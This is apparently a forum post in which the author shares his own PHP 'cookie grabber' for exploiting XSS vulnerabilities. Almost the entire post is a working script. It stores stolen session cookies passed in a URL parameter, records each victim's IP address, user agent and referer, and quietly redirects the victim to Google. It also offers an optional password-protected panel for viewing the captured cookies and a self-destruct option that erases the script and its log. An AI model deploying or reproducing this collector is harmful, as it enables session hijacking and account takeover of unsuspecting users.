I just realized that I never posted this. This is a cookie grabber for use with XSS vulnerabilities coded in PHP by me. It's simple yet powerful by allowing you to view the cookies through an XHTML interface. There are even login features if you choose to enable them.

Code
<?php
//Ghost's Cookie grabber v2.0

/* Begin Config Section */

//Password to access stolen cookies
$ConfigPassword = 'example123';

//File to write, chmodded 666
$CookieFile = "example.txt";

//Cookie name, use a-z A-Z 0-9 _
$ConfigCookie = 'make_this_a_complicated_string_a';

//Flag to identify you as wanting to retrieve cookies
$GetCookiesStr = "getcookies";
//Usage: http://www.sitename.tld/path/script.php?getcookies

//Flag to identify you as wanting to delete script and data file
$DeleteStr = "delete";
//Usage: http://www.sitename.tld/path/script.php?delete

//Name of variable you want to recover and store the stolen cookie
$StolenCookieStr = "str";
//Usage: http://www.sitename.tld/path/script.php?str=

//Place to send browser once cookie has been obtained
$Redirect = "http://www.google.com";

/* End Config Section */

$Self = $_SERVER['PHP_SELF'];
$GetCookies = $_GET["$GetCookiesStr"];
$Delete = $_GET["$DeleteStr"];
$StolenCookie = $_GET["$StolenCookieStr"];
/* Un-comment functions below for login features */

/*
//Remove the Symbols above (slash and asterisk) to enable login features.
//Remember to scroll down and remove the other part of the comment as well.
function LoggedIn()
{

global $ConfigCookie;
$Cookie = $_COOKIE["$ConfigCookie"];
if(isset($Cookie)) {
  return true;
} else {
  return false;
}

}

function LogIn()
{
global $ConfigCookie;
setcookie("$ConfigCookie");
DisplayCookies();
}

function Authenticate()
{
$Pass = $_POST['pass'];
global $ConfigPassword;
global $Self;

if($Pass == $ConfigPassword) {
   LogIn();
} else {
   ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
  <title>Login</title>
  <meta http-equiv="Content-Type" content="text/html; charset=us-ascii" />
</head>
<body>
  <form action="<?php $Self; ?>" method="post">
   <table border="1" cellspacing="1" cellpadding="1" rules="rows" align="center" width="50%">
    <tr><th>Password</th><td align="center"><input type="password" name="pass" size="25"/></td></tr>
    <tr><td align="center" colspan="2"><input type="submit" value="Login" /></td></tr>
   </table>
  </form>
</body>
</html>

<?php
}

}
//Remove The symbols below (slash and asterisk) to enable login features
*/

function DisplayCookies()
{
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
  <title>Cookie Details</title>
  <meta http-equiv="Content-Type" content="text/html; charset=us-ascii" />
</head>
<body>
  <table border="1" cellspacing="1" cellpadding="1" rules="all" align="center" width="75%">
   <tr><th colspan="6">Cookie Details</th></tr>
   <tr><th><small>IP Address</small></th><th><small>User Agent</small></th>
   <th><small>Referer</small></th><th><small>Cookie Values</small></th></tr>
<?php
global $DeleteStr;
global $CookieFile;
$handle = fopen("$CookieFile", "a+");
$CookieFileContent = fread($handle, filesize("$CookieFile"));
$i = 0;
$CookieFileExploded = explode("\n", $CookieFileContent);
$NumCFE = count($CookieFileExploded) - 1;
while($i < $NumCFE) {
$j = $i + 1;
$k = $j + 1;
$l = $k + 1;
echo '<tr><td align="center"><small>' . "$CookieFileExploded[$i]"
. '</small></td><td align="center"><small>' . "$CookieFileExploded[$j]"
. '</small></td><td align="center"><small>' . "$CookieFileExploded[$k]"
. '</small></td><td align="center"><small>' . "$CookieFileExploded[$l]"
. '</small></td></tr>' . "\n";
$i = $i + 4;
}
?>
  </table>
  


  <center><b><a href="<?php echo $Self; ?>?<?php echo $DeleteStr; ?>"><pre><font color="#000">Delete Script and Datafile</font></pre></a></b></center>
</body>
</html>
<?php
}


function SelfDestruct()
{
global $CookieFile;
$FSSelf = __FILE__;
if(file_exists($CookieFile)) {
unlink($CookieFile);
}
unlink($FSSelf);
}



function WriteCookies()
{
global $CookieFile;
global $StolenCookie;
global $Redirect;
global $Path;
$IP = $_SERVER['REMOTE_ADDR'];
$Browser = $_SERVER['HTTP_USER_AGENT'];
$Referer = $_SERVER['HTTP_REFERER'];
if($Browser == NULL) {
$Browser = "NULL";
}

if($Referer == NULL) {
$Referer = "NULL";
}

if($StolenCookie == NULL) {
$StolenCookie = "NULL";
}

$handle = fopen("$CookieFile", "a+");
$Content = "$IP" . "\n" . "$Browser" . "\n" . "$Referer" . "\n" . "$StolenCookie" . "\n";
if(is_writeable("$CookieFile")) {
$Write = fwrite($handle, "$Content");
}
header("Location: $Redirect");
fclose($handle);
}

if(function_exists('LoggedIn') && LoggedIn()) {

if(isset($Delete)) {
SelfDestruct();
die();
}

DisplayCookies();

} elseif(isset($GetCookies)) {

if(function_exists('Authenticate')) {

Authenticate();

} else {
DisplayCookies();
}

} elseif(isset($Delete)) {
SelfDestruct();
die();
} else {
WriteCookies();
}
?>
(Feature added)